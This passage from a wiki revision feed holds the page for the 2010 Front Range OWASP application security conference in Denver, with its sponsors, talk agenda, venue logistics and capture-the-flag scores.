*Denim Group&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*[http://www.accuvant.com/ Accuvant]&lt;br /&gt;
*[http://www.denimgroup.com/ Denim Group]&lt;br /&gt;
*[http://www.fortify.com/ Fortify Software]&lt;br /&gt;
*[http://www.hosting.com/ Hosting.com]&lt;br /&gt;
*[http://www.whitehatsec.com/home/index.html Whitehat Security]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring next year's Front Range OWASP Conference, please contact Kathy Thaxton at kthaxton at owasp dot org.&lt;br /&gt;
&lt;br /&gt;
Logistics information for sponsors is available [[FROC2010 Sponsor Info|here]]&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Twitter Feed====&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);&amp;quot; | &lt;br /&gt;
Use the '''[http://search.twitter.com/search?q=%23FROC #FROC]''' hashtag for your tweets (What are [http://hashtags.org/ hashtags]?) &lt;br /&gt;
&lt;br /&gt;
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''&lt;br /&gt;
&amp;lt;twitter&amp;gt;55021150&amp;lt;/twitter&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| style=&amp;quot;width: 110px; font-size: 95%; color: rgb(0, 0, 0);&amp;quot; | &lt;br /&gt;
|} &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &amp;lt;hr&amp;gt;&lt;br /&gt;
&amp;lt;paypal&amp;gt;Denver&amp;lt;/paypal&amp;gt; --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&amp;diff=84416</id>
		<title>Front Range OWASP Conference 2010</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&amp;diff=84416"/>
				<updated>2010-06-03T21:53:53Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__NOTOC__ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://froc2010.eventbrite.com/ Registration is NOW OPEN] --&amp;gt;&lt;br /&gt;
FROC2010 was a major success!  If you attended the event, please complete the [http://www.surveymonkey.com/s/FROC2010 Speaker Evaluation Survey]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;!-- Header --&amp;gt;&lt;br /&gt;
====Welcome====  &lt;br /&gt;
[[Image:Froc2010_sm.png|200px]]&lt;br /&gt;
'''Welcome to FROC 2010, the third annual Front Range OWASP Application Security Conference!'''&lt;br /&gt;
&lt;br /&gt;
After successful FROC's in June of 2008, and [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 March of 2009], we are back in Denver, Colorado USA on Wednesday the 2nd of June 2010! &lt;br /&gt;
&lt;br /&gt;
This year we again present a full day, multi-track event, which will provide valuable information for managers and executives as well as developers and engineers.&lt;br /&gt;
&lt;br /&gt;
In 2009, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2010.  This year we are organizing the conference with the support of our colleagues at the [http://www.cloudsecurityalliance.org/ Cloud Security Alliance], and will feature an AppSec track as well as a CloudSec/VirtSec track.&lt;br /&gt;
&lt;br /&gt;
====Registration====&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://froc2010.eventbrite.com Registration is now open!] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, FROC was a free event in 2008 and 2009.  This year, thanks to the generosity of our [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2010#tab=Conference_Sponsors sponsors] we are offering tickets to the event on a DONATION basis.  Pay whatever you or your company can afford.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Click [http://froc2010.eventbrite.com HERE] to register now. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Agenda====&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 2 June 2010==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference multi track format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | June 2, 2010&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to FROC 2010 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:35 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[FROC2010_Abstract_Chess|&amp;quot;Watching Software Run: Software Security Beyond Defect Elimination&amp;quot;]]&lt;br /&gt;
''Brian Chess, Fortify Software''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/a/owasp.org/leaf?id=0B_-vbfka88vFNjMxYTcwY2ItNjgxNy00ZjMzLTkwMTUtN2IyMzA4MmE3OWVl&amp;amp;sort=name&amp;amp;layout=list&amp;amp;num=50 Presentation] [http://blip.tv/file/3710067 Video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=2875886330538461390 Video] --&amp;gt;&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:35-10:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP: State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board - [http://www.owasp.org/index.php/User:Brennan BIO]''&lt;br /&gt;
&lt;br /&gt;
[http://blip.tv/file/3710155 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:00-10:20 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Cloud Security Alliance: State of the Union&lt;br /&gt;
''Randy Barr, Cloud Security Alliance''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:20-10:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:22%; background:#BC857A&amp;quot; | '''AppSec/Technical Track: Room 1'''&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; | '''Cloud/Mobile/Emerging Track: Room 2'''&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; | '''Management / Exec Track: Room 3'''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Grossman|2010: Web Hacking Odyssey - The Top Hacks of the Year]]&amp;quot;&lt;br /&gt;
''Jeremiah Grossman''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFZTIwOWY3NjctZTY1OC00YTRjLThjNGUtMDIwZTk3MmVhN2Zi&amp;amp;hl=en Presentation] Video&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_McClellan|&amp;quot;Building a Secure, Compliant Cloud for the Enterprise&amp;quot;]]&lt;br /&gt;
''Matt Ferrari, Hosting.com''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Byrne|&amp;quot;Anatomy of a Logic Flaw&amp;quot;]]&lt;br /&gt;
''David Byrne and Charles Henderson, Trustwave''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Zusman|Advanced MITM Techniques for Security Testers]]&amp;quot;&lt;br /&gt;
''Mike Zusman, Raj Umadas and Aaron Rhodes, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Nickerson|&amp;quot;YOU are the weakest link&amp;quot;]]&lt;br /&gt;
''Chris Nickerson, Lares Consulting''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Whaley|&amp;quot;Effectively marketing security as a win for both the business and the customer&amp;quot;]]&lt;br /&gt;
''Ben Whaley, Applied Trust Engineering and Jeff Smith, Rally Software''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Wheeler|Vulnerabilities in Secure Code: Now and Beyond]]&amp;quot;&lt;br /&gt;
''Alex Wheeler and Ryan Smith, Accuvant''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Roberts|&amp;quot;Real life CSI – Data Mining and Intelligence Gathering for the masses&amp;quot;]]&lt;br /&gt;
''Chris Roberts, Cyopsis''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Dickson|&amp;quot;The Permanent Campaign: Driving a Secure Software Initiative in the Enterprise&amp;quot;]]&lt;br /&gt;
''John Dickson, Denim Group''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:40 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Byrne2|Beware of Serialized GUI Objects Bearing Data]]&amp;quot;&lt;br /&gt;
''David Byrne and Rohini Sulatycki, Trustwave''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Zusman2|&amp;quot;What's Old Is New Again: An Overview of Mobile Application Security&amp;quot;]]&lt;br /&gt;
''Zach Lanier and Mike Zusman, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Goldschmidt|&amp;quot;Fundamental Practices and Tools to implement a security development lifecycle&amp;quot;]]&lt;br /&gt;
''Cassio Goldschmidt, Symantec''&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:40-15:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | BREAK&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Schmidt|Solving Real-World Problems with an  Enterprise Security API]]&amp;quot;&lt;br /&gt;
''Chris Schmidt''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFNjM5NzZmODQtZTQ1OS00NTYxLWJmOWQtNzE3OWY4OWZkOGMw&amp;amp;hl=en Presentation] Video&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Tucker|&amp;quot;Cloudy with a chance of hack&amp;quot;]]&lt;br /&gt;
''Lars Ewe, Cenzic''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/present/edit?id=0Af-vbfka88vFZGRrcjYycXZfMjUyZDQ3enN6ZmI&amp;amp;hl=en Presentation]&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Cornell|&amp;quot;Application Security Program Management with Vulnerability Manager&amp;quot;]]&lt;br /&gt;
''Bryan Beverly, Denim Group''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFNTY3OGUwMGItMmQyMi00YWRmLWJkMzgtMTZhNDNlZjJiNWJm&amp;amp;hl=en Presentation]&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Panel Discussion: Topic TBD.  Moderator: John Dickson, Denim Group&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Wrap up, vendor raffles, CTF awards, FREE BEER!&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Logistics====&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will again be held at University of Colorado, Denver.  However, instead of the Tivoli Student Union, this year the event will be hosted at the North Classroom building (Atrium UCD).&lt;br /&gt;
&lt;br /&gt;
[[File:Froc map.GIF|thumb|left]]&lt;br /&gt;
&lt;br /&gt;
[http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=en&amp;amp;geocode=&amp;amp;q=1200+Larimer+Street,+Denver,+CO&amp;amp;sll=37.0625,-95.677068&amp;amp;sspn=37.188995,62.226563&amp;amp;ie=UTF8&amp;amp;hq=&amp;amp;hnear=1200+Larimer+St,+Denver,+Colorado+80204&amp;amp;z=16&amp;amp;iwloc=A Google Map of the Venue: 1200 Larimer St., Denver CO 80204]&lt;br /&gt;
&lt;br /&gt;
=====Accomodation=====&lt;br /&gt;
OWASP has negotiated discounted rates with the uber-pimpin [http://www.hotelteatro.com/ Hotel Teatro].  Rooms under the FROC rate are $159/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention FROC or use the [https://reservations.ihotelier.com/crs/g_reservation.cfm?groupID=464765&amp;amp;hotelID=14708 iHotelier.com link here].&lt;br /&gt;
&lt;br /&gt;
=====How to get to the venue?=====&lt;br /&gt;
&lt;br /&gt;
*By taxi: taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free&lt;br /&gt;
&lt;br /&gt;
*By car: there is plenty of parking at the UCD.  Attendees should park at the Tivoli lot (as in past years) and it is a short walk to the North Classroom buildings.  Parking validation will be provided for registered FROC participants.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
====Call for Presentations====&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2010_CFP|call for presentations]] closed 31 March 2010.  We are no longer accepting proposals for presentations.  If you have already submitted a presentation you can, however update your abstract or submit additional information to clarify your proposal. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
====Agenda and Presentations: 5 March 2009====&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;Top Ten Web Hacking Techniques of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=2875886330538461390 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-8396241750899139680 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Stads|&amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot;]] &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=1629208419122953007 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-2540122072368010669 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=3127205451740977427 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter The Stupid&amp;quot;]]&lt;br /&gt;
''David Byrne &amp;amp; Charles Henderson, Trustwave''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=7611144342490803641 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=129190988572738701 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-4972597638535731442 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=8588268474844052248 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Capture the Flag (CTF)====&lt;br /&gt;
&lt;br /&gt;
A capture the flag contest was held, with challenges in the categories of network, forensics, and web applications.   The winner received a new iPad.  Second and third place received an iPod shuffle.&lt;br /&gt;
&lt;br /&gt;
The team that won the contest consisted of four members of the Denver Defcon group, dc303 (http://dc303.org).  This group also plays in the annual Defcon CTF competition (with about 20 other folks from the Denver area).  If you are interested in joining them for future CTF competitions (local and abroad), contact mantis1 at gmail.com.&lt;br /&gt;
&lt;br /&gt;
Second place went to Mattew Rowley (playing on his own)&lt;br /&gt;
&lt;br /&gt;
Final scores:&lt;br /&gt;
{| border=&amp;quot;3&amp;quot;&lt;br /&gt;
|Rank||Name||Score||Comments&lt;br /&gt;
|-&lt;br /&gt;
|'''1'''||'''mantis'''||'''4500'''||&lt;br /&gt;
|-&lt;br /&gt;
|'''2'''||'''Mathew Rowley'''||'''2850'''||'''(wuntee)'''&lt;br /&gt;
|-&lt;br /&gt;
|'''3'''||'''jgimer'''||'''2300'''||&lt;br /&gt;
|-&lt;br /&gt;
|4||jsouza||2200||&lt;br /&gt;
|-&lt;br /&gt;
|5||CSURams||1800||&lt;br /&gt;
|-&lt;br /&gt;
|6||quincymagoo||1200||&lt;br /&gt;
|-&lt;br /&gt;
|7||skehoe||700||&lt;br /&gt;
